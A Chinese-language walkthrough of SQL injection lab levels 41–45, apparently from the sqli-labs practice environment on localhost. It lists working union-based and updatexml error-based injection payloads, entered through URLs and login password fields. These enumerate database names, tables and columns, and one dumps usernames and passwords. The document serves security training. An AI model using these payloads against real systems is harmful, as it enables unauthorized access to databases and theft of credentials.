第41关
一.查询数据库
http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,database()--+http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,database()--+
二.查表
http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+
三.查列
http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+
四.查user表里所有数据
http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+
第42关
一.登录页面
二.查询数据库
在密码框里输入
'and updatexml(1,concat(~,(select database()),~),1)
三.查表
在密码框里输入
'and updatexml(1,concat(~,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),~),1)
四.查列
在密码框里输入
'and updatexml(1,concat(~,(select group_concat(column_name) from information_schema.columns where table_name='users' ),~),1)
第43关
一.登录页面
二. 查询数据库
在密码框里输入
') and updatexml(1,concat(~,(select database()),~),1)
三.查表名
在密码框里输入
') and updatexml(1,concat(~,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),~),1)
四.查列
') and updatexml(1,concat(~,(select group_concat(column_name) from information_schema.columns where table_name='users' ),~),1)
第44关
一.查询数据库
在密码框中输入
1' union select 1,database(),3 #
二.查表
在密码框中输入1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
三.查列
在密码框中输入1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails' #
第45关
一.查询数据库
在密码框中输入1') union select 1,database(),3 #
二.查表
在密码框中输入1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
三.查列
在密码框中输入1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails' #